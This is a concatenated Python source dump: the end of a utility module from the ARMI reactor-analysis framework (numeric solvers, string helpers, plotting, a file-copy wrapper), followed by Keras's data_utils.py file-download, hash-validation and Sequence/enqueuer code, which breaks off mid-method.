In this form, this just finds one pickle error and then crashes. If you want
to make it work like the other testPickle functions and handle errors, you could.
But usually you just have to find one unpickleable SOB.
"""
with tempfile.TemporaryFile() as output:
try:
MyPickler(output).dump(obj)
except (pickle.PicklingError, TypeError):
pass
def classesInHierarchy(obj, classCounts, visited=None):
"""
Count the number of instances of each class contained in an object's hierarchy.
"""
if not isinstance(classCounts, collections.defaultdict):
raise TypeError(
"Need to pass in a default dict for classCounts (it's an out param)"
)
if visited is None:
classCounts[type(obj)] += 1
visited = set()
visited.add(id(obj))
try:
for c in obj.__dict__.values():
if id(c) not in visited:
classCounts[type(c)] += 1
visited.add(id(c))
classesInHierarchy(c, classCounts, visited=visited)
except AttributeError:
pass
def slantSplit(val, ratio, nodes, order="low first"):
r"""
Returns a list of values whose sum is equal to the value specified.
The ratio between the highest and lowest value is equal to the specified ratio,
and the middle values trend linearly between them.
"""
val = float(val)
ratio = float(ratio)
nodes = int(nodes)
v0 = 2.0 * val / (nodes * (1.0 + ratio))
X = []
for i in range(nodes):
X.append(v0 + i * (v0 * ratio - v0) / (nodes - 1))
if order == "high first":
X.reverse()
return X
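# Usage sketch (illustrative only): splitting 100.0 across 4 nodes with a 3:1
# high/low ratio; the numbers are arbitrary.
def _exampleSlantSplit():
    return slantSplit(100.0, 3.0, 4)  # -> [12.5, 20.83..., 29.17..., 37.5]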
def newtonsMethod(
func, goal, guess, maxIterations=None, cs=None, positiveGuesses=False
):
r"""
Solves a Newton's method with the given function, goal value, and first guess.
Parameters
----------
func : function
The function that guess will be changed to try to make it return the goal value.
goal : float
The guess will be adjusted until the function's return value equals this value.
guess : float
The first guess value to do Newton's method on the func.
maxIterations : int
The maximum number of iterations that Newton's method will be allowed to perform.
Returns
-------
ans : float
The guess that when input to the func returns the goal.
"""
def goalFunc(guess, func, positiveGuesses):
if positiveGuesses is True:
guess = abs(guess)
funcVal = func(guess)
val = abs(goal - funcVal)
return val
if (maxIterations is None) and (cs is not None):
maxIterations = cs["maxNewtonsIterations"]
# try:
ans = float(
sciopt.newton(
goalFunc,
guess,
args=(func, positiveGuesses),
tol=1.0e-3,
maxiter=maxIterations,
)
)
if positiveGuesses is True:
ans = abs(ans)
return ans
def minimizeScalarFunc(
func,
goal,
guess,
maxIterations=None,
cs=None,
positiveGuesses=False,
method=None,
tol=1.0e-3,
):
r"""
Use scipy minimize with the given function, goal value, and first guess.
Parameters
----------
func : function
The function that guess will be changed to try to make it return the goal value.
goal : float
The guess will be adjusted until the function's return value equals this value.
guess : float
The first guess value passed to the minimizer.
maxIterations : int
The maximum number of iterations the minimizer will be allowed to perform.
Returns
-------
ans : float
The guess that when input to the func returns the goal.
"""
def goalFunc(guess, func, positiveGuesses):
if positiveGuesses is True:
guess = abs(guess)
funcVal = func(guess)
val = abs(goal - funcVal)
return val
if (maxIterations is None) and (cs is not None):
maxIterations = cs["maxNewtonsIterations"]
X = sciopt.minimize(
goalFunc,
guess,
args=(func, positiveGuesses),
method=method,
tol=tol,
options={"maxiter": maxIterations},
)
ans = float(X["x"])
if positiveGuesses is True:
ans = abs(ans)
return ans
def runFunctionFromAllModules(funcName, *args, **kwargs):
r"""
Runs funcName on all modules of ARMI, if it exists.
Parameters
----------
funcName : str
The function to run if it is found in a module.
\*args, \*\*kwargs : arguments to pass to func if it is found
Notes
-----
This imports all modules in ARMI, and if you have a script that isn't inside a
``if __name__=='__main__'``, you will be in trouble.
This could also be useful for finding input consistency checkers for the GUI.
See Also
--------
armi.settings.addAllDefaultSettings : gets all the settings from all modules
"""
for _modImporter, name, _ispkg in pkgutil.walk_packages(
path=armi.__path__, prefix=armi.__name__ + "."
):
try:
mod = importlib.import_module(name)
if funcName in dir(mod): # there is a module.funcName. so call it.
func = getattr(mod, funcName)
func(*args, **kwargs)
except:
# just print traceback but don't throw an error.
traceback.print_exc()
# TODO: move to pathTools
def mkdir(dirname):
r"""
Keeps trying to make a directory, outputting whatever errors it encounters,
until it is successful.
Parameters
----------
dirname : str
Path to the directory to create.
What you would normally pass to os.mkdir.
"""
numTimesTried = 0
while numTimesTried < 1000:
try:
os.mkdir(dirname)
break
except FileExistsError:
break
except Exception as err:
numTimesTried += 1
# Only output err every 10 times.
if numTimesTried % 10 == 0:
print(err)
# Wait 0.5 seconds, try again.
time.sleep(0.5)
def prependToList(originalList, listToPrepend):
"""
Add a new list to the beginning of an original list.
Parameters
----------
originalList : list
The list to prepend to.
listToPrepend : list
The list to add to the beginning of (prepend) the originalList.
Returns
-------
originalList : list
The original list with the listToPrepend at its beginning.
"""
listToPrepend.reverse()
originalList.reverse()
originalList.extend(listToPrepend)
originalList.reverse()
listToPrepend.reverse()
return originalList
def capStrLen(s: str, length: int) -> str:
"""
Truncates a string to a certain length.
Adds '...' if it's too long.
Parameters
----------
s : str
The string to cap at the specified length.
length : int
The maximum length of the string s.
"""
if length <= 2:
raise Exception("l must be at least 3 in utils.capStrLen")
if len(s) <= length:
return s
return s[0 : length - 3] + "..."
def list2str(strings, width=None, preStrings=None, fmt=None):
"""
Turn a list of strings into one string, applying the specified format to each.
Parameters
----------
strings : list
The items to create centered strings in the line for.
Can be str, float, int, etc.
width : int, optional
The maximum width that the strings are allowed to take up.
Only strings are affected by this parameter, because it does
not make sense to truncate ints or floats.
preStrings : list of str, optional
Any strings that come before the centered strings.
fmt : str, optional
The format to apply to each string, such as
' >4d', '^12.4E'.
"""
if preStrings is None:
preStrings = []
if fmt is None:
fmt = ""
newStrings = []
for string in strings:
if isinstance(string, str) and width is not None:
string = capStrLen(str(string), width)
string = "{0:{fmt}}".format(string, fmt=fmt)
newStrings.append(string)
preStrings.extend(newStrings)
return "".join(preStrings)
def createFormattedStrWithDelimiter(
dataList, maxNumberOfValuesBeforeDelimiter=9, delimiter="\n"
):
r"""
Return a formatted string with delimiters from a list of data.
Parameters
----------
dataList : list
List of data that will be formatted into a string
maxNumberOfValuesBeforeDelimiter : int
maximum number of values to have before the delimiter is added
delimiter : str
A delimiter on the formatted string (default: "\n")
Notes
-----
As an example::
>>> createFormattedStrWithDelimiter(['hello', 'world', '1', '2', '3', '4'],
... maxNumberOfValuesBeforeDelimiter=3, delimiter = '\n')
"hello, world, 1, \n2, 3, \n4, 5\n"
"""
formattedString = ""
if not dataList:
return formattedString
if not maxNumberOfValuesBeforeDelimiter:
numRows = 1
else:
numRows = (
int(
math.ceil(
float(len(dataList)) / float(maxNumberOfValuesBeforeDelimiter)
)
)
or 1
)
# Create a list of string delimiters to use when joining the strings
commaList = ["," for d in dataList]
commaList[-1] = ""
dataList = [str(d) + commaList[i] for i, d in enumerate(dataList)]
for splitList in iterables.split(dataList, n=numRows, padWith=""):
formattedString += " ".join(splitList) + delimiter
return formattedString
def rotateXY(x, y, degreesCounterclockwise=None, radiansCounterclockwise=None):
"""
Rotates x, y coordinates
Parameters
----------
x, y : array_like
coordinates
degreesCounterclockwise : float
Degrees to rotate in the CCW direction
radiansCounterclockwise : float
Radians to rotate in the CCW direction
Returns
-------
xr, yr : array_like
the rotated coordinates.
"""
if radiansCounterclockwise is None:
radiansCounterclockwise = degreesCounterclockwise * math.pi / 180.0
sinT = math.sin(radiansCounterclockwise)
cosT = math.cos(radiansCounterclockwise)
rotationMatrix = numpy.array([[cosT, -sinT], [sinT, cosT]])
xr, yr = rotationMatrix.dot(numpy.vstack((x, y)))
if len(xr) > 1:
## Convert to lists because everyone prefers lists for some reason
return xr.tolist(), yr.tolist()
else:
## Convert to scalar for consistency with old implementation
return xr[0], yr[0]
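# Usage sketch (illustrative only): rotating the point (1, 0) by 90 degrees
# counterclockwise; the coordinates are arbitrary.
def _exampleRotateXY():
    xr, yr = rotateXY([1.0], [0.0], degreesCounterclockwise=90.0)
    return xr, yr  # approximately (0.0, 1.0), returned as scalars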
def convertToSlice(x, increment=False):
"""
Convert an int, float, list of ints or floats, None, or slice
to a slice. Also optionally increments that slice to make it easy to line
up lists that don't start with 0.
Use this with numpy.array (numpy.ndarray) types to easily get selections of its elements.
Parameters
----------
x : multiple types allowed.
int: select one index.
list of int: select these index numbers.
None: select all indices.
slice: select this slice
Returns
-------
slice : slice
Returns a slice object that can be used in an array
like a[x] to select from its members.
If ``increment`` is given, the slice has its index numbers shifted by that amount.
It can also return a numpy array, which can be used
to slice other numpy arrays in the same way as a slice.
Examples
--------
a = numpy.array([10, 11, 12, 13])
>>> convertToSlice(2)
slice(2, 3, None)
>>> a[convertToSlice(2)]
array([12])
>>> convertToSlice(2, increment=-1)
slice(1, 2, None)
>>> a[convertToSlice(2, increment=-1)]
array([11])
>>> a[convertToSlice(None)]
array([10, 11, 12, 13])
>>> a[utils.convertToSlice([1, 3])]
array([11, 13])
>>> a[utils.convertToSlice([1, 3], increment=-1)]
array([10, 12])
>>> a[utils.convertToSlice(slice(2, 3, None), increment=-1)]
array([11])
"""
if increment is False:
increment = 0
if not isinstance(increment, int):
raise Exception("increment must be False or an integer in utils.convertToSlice")
if x is None:
x = numpy.s_[:]
if isinstance(x, list):
x = numpy.array(x)
if isinstance(x, (int, numpy.integer)) or isinstance(x, (float, numpy.floating)):
x = slice(int(x), int(x) + 1, None)
# Correct the slice indices to be group instead of index based.
# The energy groups are 1..x and the indices are 0..x-1.
if isinstance(x, slice):
if x.start is not None:
jstart = x.start + increment
else:
jstart = None
if x.stop is not None:
if isinstance(x.stop, list):
jstop = [x + increment for x in x.stop]
else:
jstop = x.stop + increment
else:
jstop = None
jstep = x.step
return numpy.s_[jstart:jstop:jstep]
elif isinstance(x, numpy.ndarray):
return numpy.array([i + increment for i in x])
else:
raise Exception(
(
"It is not known how to handle x type: " "{0} in utils.convertToSlice"
).format(type(x))
)
def plotMatrix(
matrix,
fName,
minV=None,
maxV=None,
show=False,
title=None,
xlabel=None,
ylabel=None,
xticks=None,
yticks=None,
cmap=None,
figsize=None,
):
"""
Plots a matrix
"""
import matplotlib
import matplotlib.pyplot as plt
if figsize:
plt.figure(figsize=figsize) # dpi=300)
else:
plt.figure()
if cmap is None:
cmap = plt.cm.jet # @UndefinedVariable #pylint: disable=no-member
cmap.set_bad("w")
try:
matrix = matrix.todense()
except:
pass
if minV:
norm = matplotlib.colors.Normalize(minV, maxV)
else:
norm = None
if title is None:
title = fName
plt.imshow(
matrix, cmap=cmap, norm=norm, interpolation="nearest"
) # or bicubic or nearest#,vmin=0, vmax=300)
plt.colorbar()
plt.title(title)
plt.xlabel(xlabel)
plt.ylabel(ylabel)
if xticks:
plt.xticks(*xticks, rotation=90)
if yticks:
plt.yticks(*yticks)
plt.grid()
plt.savefig(fName)
if show:
plt.show()
plt.close()
def userName() -> str:
"""
Return a database-friendly username.
This will return the current user's username, removing any single-character
prefix (e.g. ``s-``), if present.
Notes
-----
ARMI uses the user name in a number of places, namely in the database names, which
cannot contain hyphens.
"""
return re.sub("^[a-zA-Z]-", "", getpass.getuser())
def expandRepeatedFloats(repeatedList):
"""
Return an expanded repeat list.
Notes
-----
R char is valid for showing the number of repeats in MCNP. For example, the list:
[150, 200, '9R']
indicates a 150-day cycle followed by ten 200-day cycles.
"""
nonRepeatList = []
for val in repeatedList:
isRepeat = False
if isinstance(val, str):
val = val.upper()
if val.count("R") > 1:
raise ValueError("List had strings that were not repeats")
elif "R" in val:
val = val.replace("R", "")
isRepeat = True
if isRepeat:
nonRepeatList += [nonRepeatList[-1]] * int(val)
else:
nonRepeatList.append(float(val))
return nonRepeatList
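# Usage sketch (illustrative only): expanding the MCNP-style repeat notation
# described above; the cycle lengths are arbitrary.
def _exampleExpandRepeatedFloats():
    return expandRepeatedFloats([150, 200, "9R"])
    # -> [150.0, 200.0, 200.0, ...] with ten 200.0 entries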
def getStepsFromValues(values, prevValue=0.0):
"""Convert list of floats to list of steps between each float."""
steps = []
for val in values:
currentVal = float(val)
steps.append(currentVal - prevValue)
prevValue = currentVal
return steps
def average1DWithinTolerance(vals, tolerance=0.2):
"""
Compute the average of a series of arrays with a tolerance.
Tuned for averaging assembly meshes or block heights.
Parameters
----------
vals : 2D numpy.array
could be assembly x axial mesh tops or heights
"""
vals = numpy.array(vals)
filterOut = numpy.array([False]) # this gets discarded
while not filterOut.all(): # 20% difference is the default tolerance
avg = vals.mean(axis=0) # average over all columns
diff = abs(vals - avg) / avg # no nans, because all vals are non-zero
filterOut = (diff > tolerance).sum(
axis=1
) == 0 # True = 1, sum across axis means any height in assem is off
vals = vals[filterOut] # filter anything that is skewing
if vals.size == 0:
raise ValueError("Nothing was near the mean, there are no acceptable values!")
if (avg <= 0.0).any():
raise ValueError(
"A non-physical value (<=0) was computed, but this is not possible.\n"
"Values: {}\navg: {}".format(vals, avg)
)
return avg
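# Usage sketch (illustrative only): averaging four consistent rows while the
# one outlier row exceeding the 20% tolerance is rejected; the mesh values are
# arbitrary.
def _exampleAverage1DWithinTolerance():
    heights = numpy.array([[1.0, 2.0, 3.0]] * 4 + [[2.0, 4.0, 6.0]])
    return average1DWithinTolerance(heights, tolerance=0.2)  # -> array([1., 2., 3.])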
def findNearestValue(searchList, searchValue):
"""Search a given list for the value that is closest to the given search value."""
return findNearestValueAndIndex(searchList, searchValue)[0]
def findNearestValueAndIndex(searchList, searchValue):
"""Search a given list for the value that is closest to the given search value. Return a tuple
containing the value and its index in the list."""
searchArray = numpy.array(searchList)
closestValueIndex = (numpy.abs(searchArray - searchValue)).argmin()
return searchArray[closestValueIndex], closestValueIndex
class MergeableDict(dict):
"""
Overrides python dictionary and implements a merge method.
Notes
-----
Allows multiple dictionaries to be combined in a single line
"""
def merge(self, *otherDictionaries) -> None:
for dictionary in otherDictionaries:
self.update(dictionary)
shutil_copy = shutil.copy
def safeCopy(src: str, dst: str) -> None:
"""This copy overwrites ``shutil.copy`` and checks that copy operation is truly completed before continuing."""
waitTime = 0.01 # 10 ms
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
srcSize = os.path.getsize(src)
shutil.copyfile(src, dst)
shutil.copymode(src, dst)
while True:
dstSize = os.path.getsize(dst)
if srcSize == dstSize:
break
time.sleep(waitTime)
runLog.extra("Copied {} -> {}".format(src, dst))
shutil.copy = safeCopy
|
data_utils.py
|
# Lint as python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-import-not-at-top
"""Utilities for file download and caching."""
import tensorflow.compat.v2 as tf
from abc import abstractmethod
from contextlib import closing
import functools
import hashlib
import multiprocessing.dummy
import os
import pathlib
import queue
import random
import shutil
import tarfile
import threading
import time
import typing
import urllib
import weakref
import zipfile
from six.moves.urllib.parse import urlsplit
import numpy as np
from six.moves.urllib.request import urlopen
from keras.utils import tf_inspect
from keras.utils.generic_utils import Progbar
from keras.utils import io_utils
from tensorflow.python.util.tf_export import keras_export
# Required to support google internal urlretrieve
if True: # This gets transformed to `if sys.version_info[0] == 2:` in OSS. # pylint: disable=using-constant-test
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrieve` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
Args:
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once on establishment of
the network connection and once after each block read thereafter. The
hook will be passed three arguments; a count of blocks transferred so
far, a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
content_type = response.info().get('Content-Length')
total_size = -1
if content_type is not None:
total_size = int(content_type.strip())
count = 0
while True:
chunk = response.read(chunk_size)
count += 1
if reporthook is not None:
reporthook(count, chunk_size, total_size)
if chunk:
yield chunk
else:
break
response = urlopen(url, data)
with open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from urllib.request import urlretrieve # pylint: disable=g-importing-member
def is_generator_or_sequence(x):
"""Check if `x` is a Keras generator type."""
builtin_iterators = (str, list, tuple, dict, set, frozenset)
if isinstance(x, (tf.Tensor, np.ndarray) + builtin_iterators):
return False
return (tf_inspect.isgenerator(x) or
isinstance(x, Sequence) or
isinstance(x, typing.Iterator))
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
Args:
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
Returns:
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format == 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, str):
archive_format = [archive_format]
file_path = io_utils.path_to_string(file_path)
path = io_utils.path_to_string(path)
for archive_type in archive_format:
if archive_type == 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type == 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError, KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
@keras_export('keras.utils.get_file')
def get_file(fname=None,
origin=None,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
Example:
```python
path_to_downloaded_file = tf.keras.utils.get_file(
"flower_photos",
"https://storage.googleapis.com/download.tensorflow.org/example_images/flower_photos.tgz",
untar=True)
```
Args:
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location. If `None`, the
name of the file at `origin` will be used.
origin: Original URL of the file.
untar: Deprecated in favor of `extract` argument.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of `file_hash` argument.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are `'md5'`, `'sha256'`, and `'auto'`.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are `'auto'`, `'tar'`, `'zip'`, and `None`.
`'tar'` includes tar, tar.gz, and tar.bz files.
The default `'auto'` corresponds to `['tar', 'zip']`.
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the default directory `~/.keras/`.
Returns:
Path to the downloaded file
"""
if origin is None:
raise ValueError('Please specify the "origin" argument (URL of the file '
'to download).')
if cache_dir is None:
cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
_makedirs_exist_ok(datadir)
fname = io_utils.path_to_string(fname)
if not fname:
fname = os.path.basename(urlsplit(origin).path)
if not fname:
raise ValueError(
f"Can't parse the file name from the origin provided: '{origin}'."
"Please specify the `fname` as the input param.")
if untar:
if fname.endswith('.tar.gz'):
fname = pathlib.Path(fname)
# The 2 `.with_suffix()` are because of `.tar.gz` as pathlib
# considers it as 2 suffixes.
fname = fname.with_suffix('').with_suffix('')
fname = str(fname)
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
io_utils.print_msg(
'A local file was found, but it seems to be '
f'incomplete or outdated because the {hash_algorithm} '
f'file hash does not match the original value of {file_hash} '
'so we will re-download the data.')
download = True
else:
download = True
if download:
io_utils.print_msg(f'Downloading data from {origin}')
class ProgressTracker:
# Maintain progbar for the lifetime of download.
# This design was chosen for Python 2.7 compatibility.
progbar = None
def dl_progress(count, block_size, total_size):
if ProgressTracker.progbar is None:
if total_size == -1:
total_size = None
ProgressTracker.progbar = Progbar(total_size)
else:
ProgressTracker.progbar.update(count * block_size)
error_msg = 'URL fetch failure on {}: {} -- {}'
try:
try:
urlretrieve(origin, fpath, dl_progress)
except urllib.error.HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except urllib.error.URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except (Exception, KeyboardInterrupt) as e:
if os.path.exists(fpath):
os.remove(fpath)
raise
ProgressTracker.progbar = None
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
def _makedirs_exist_ok(datadir):
os.makedirs(datadir, exist_ok=True) # pylint: disable=unexpected-keyword-arg
def _resolve_hasher(algorithm, file_hash=None):
"""Returns hash algorithm as hashlib function."""
if algorithm == 'sha256':
return hashlib.sha256()
if algorithm == 'auto' and file_hash is not None and len(file_hash) == 64:
return hashlib.sha256()
# This is used only for legacy purposes.
return hashlib.md5()
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
Example:
```python
_hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
Args:
fpath: path to the file being validated
algorithm: hash algorithm, one of `'auto'`, `'sha256'`, or `'md5'`.
The default `'auto'` detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
The file hash
"""
if isinstance(algorithm, str):
hasher = _resolve_hasher(algorithm)
else:
hasher = algorithm
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
Args:
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
Whether the file is valid
"""
hasher = _resolve_hasher(algorithm, file_hash)
if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash):
return True
else:
return False
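# Usage sketch (illustrative only): hashing a throwaway temporary file and
# validating it against its own sha256 digest; the file contents are arbitrary.
def _example_validate_file():
  import tempfile
  with tempfile.NamedTemporaryFile(delete=False) as f:
    f.write(b'hello keras')
    fpath = f.name
  digest = _hash_file(fpath, algorithm='sha256')
  is_valid = validate_file(fpath, digest, algorithm='auto')  # 64-char hash -> sha256
  os.remove(fpath)
  return is_valid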
class ThreadsafeIter:
"""Wrap an iterator with a lock and propagate exceptions to all threads."""
def __init__(self, it):
self.it = it
self.lock = threading.Lock()
# After a generator throws an exception all subsequent next() calls raise a
# StopIteration Exception. This, however, presents an issue when mixing
# generators and threading because it means the order of retrieval need not
# match the order in which the generator was called. This can make it appear
# that a generator exited normally when in fact the terminating exception is
# just in a different thread. In order to provide thread safety, once
# self.it has thrown an exception we continue to throw the same exception.
self._exception = None
def __iter__(self):
return self
def next(self):
return self.__next__()
def __next__(self):
with self.lock:
if self._exception:
raise self._exception # pylint: disable=raising-bad-type
try:
return next(self.it)
except Exception as e:
self._exception = e
raise
def threadsafe_generator(f):
@functools.wraps(f)
def g(*a, **kw):
return ThreadsafeIter(f(*a, **kw))
return g
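# Usage sketch (illustrative only): wrapping a trivial counter generator so
# that concurrent next() calls are serialized by the ThreadsafeIter lock above;
# the generator body is arbitrary.
@threadsafe_generator
def _example_thread_safe_counter(limit=3):
  for i in range(limit):
    yield i
# e.g. list(_example_thread_safe_counter()) -> [0, 1, 2], and the returned
# iterator can be shared between worker threads.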
@keras_export('keras.utils.Sequence')
class Sequence:
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implement the `__getitem__` and the `__len__` methods.
If you want to modify your dataset between epochs you may implement
`on_epoch_end`.
The method `__getitem__` should return a complete batch.
Notes:
`Sequence` is a safer way to do multiprocessing. This structure guarantees
that the network will only train once on each sample per epoch, which is not
the case with generators.
Examples:
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
import math
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
def __len__(self):
return math.ceil(len(self.x) / self.batch_size)
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) *
self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) *
self.batch_size]
return np.array([
resize(imread(file_name), (200, 200))
for file_name in batch_x]), np.array(batch_y)
```
"""
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
Args:
index: position of the batch in the Sequence.
Returns:
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
Returns:
The number of batches in the Sequence.
"""
raise NotImplementedError
def on_epoch_end(self):
"""Method called at the end of every epoch.
"""
pass
def __iter__(self):
"""Create a generator that iterate over the Sequence."""
for item in (self[i] for i in range(len(self))):
yield item
def iter_sequence_infinite(seq):
"""Iterates indefinitely over a Sequence.
Args:
seq: `Sequence` instance.
Yields:
Batches of data from the `Sequence`.
"""
while True:
for item in seq:
yield item
# Global variables to be shared across processes
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
_SEQUENCE_COUNTER = None
# Because multiprocessing pools are inherently unsafe, starting from a clean
# state can be essential to avoiding deadlocks. In order to accomplish this, we
# need to be able to check on the status of Pools that we create.
_DATA_POOLS = weakref.WeakSet()
_WORKER_ID_QUEUE = None # Only created if needed.
_WORKER_IDS = set()
_FORCE_THREADPOOL = False
_FORCE_THREADPOOL_LOCK = threading.RLock()
def dont_use_multiprocessing_pool(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
with _FORCE_THREADPOOL_LOCK:
global _FORCE_THREADPOOL
old_force_threadpool, _FORCE_THREADPOOL = _FORCE_THREADPOOL, True
out = f(*args, **kwargs)
_FORCE_THREADPOOL = old_force_threadpool
return out
return wrapped
def get_pool_class(use_multiprocessing):
global _FORCE_THREADPOOL
if not use_multiprocessing or _FORCE_THREADPOOL:
return multiprocessing.dummy.Pool # ThreadPool
return multiprocessing.Pool
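# Illustrative sketch (not part of the original module): `dont_use_multiprocessing_pool`
# temporarily forces `get_pool_class` to hand back the thread-based pool even when the
# caller asks for multiprocessing, which is useful when forking must be avoided.
#
#   @dont_use_multiprocessing_pool
#   def run_preprocessing(items):
#       pool_cls = get_pool_class(use_multiprocessing=True)   # still a ThreadPool here
#       with closing(pool_cls(2)) as pool:
#           return pool.map(str.upper, items)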
def get_worker_id_queue():
"""Lazily create the queue to track worker ids."""
global _WORKER_ID_QUEUE
if _WORKER_ID_QUEUE is None:
_WORKER_ID_QUEUE = multiprocessing.Queue()
return _WORKER_ID_QUEUE
def init_pool(seqs):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = seqs
def get_index(uid, i):
"""Get the value from the Sequence `uid` at index `i`.
To allow multiple Sequences to be used at the same time, we use `uid` to
get a specific one. A single Sequence would cause the validation to
overwrite the training Sequence.
Args:
uid: int, Sequence identifier
i: index
Returns:
The value at index `i`.
"""
return _SHARED_SEQUENCES[uid][i]
@keras_export('keras.utils.SequenceEnqueuer')
class SequenceEnqueuer:
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
Example:
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.stop()
```
The `enqueuer.get()` should be an infinite stream of data.
"""
def __init__(self, sequence,
use_multiprocessing=False):
self.sequence = sequence
self.use_multiprocessing = use_multiprocessing
global _SEQUENCE_COUNTER
if _SEQUENCE_COUNTER is None:
try:
_SEQUENCE_COUNTER = multiprocessing.Value('i', 0)
except OSError:
# In this case the OS does not allow us to use
# multiprocessing. We resort to an int
# for enqueuer indexing.
_SEQUENCE_COUNTER = 0
if isinstance(_SEQUENCE_COUNTER, int):
self.uid = _SEQUENCE_COUNTER
_SEQUENCE_COUNTER += 1
else:
# Doing Multiprocessing.Value += x is not process-safe.
with _SEQUENCE_COUNTER.get_lock():
self.uid = _SEQUENCE_COUNTER.value
_SEQUENCE_COUNTER.value += 1
self.workers = 0
self.executor_fn = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Starts the handler's workers.
Args:
workers: Number of workers.
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = self._get_executor_init(workers)
else:
# We do not need the init since it's threads.
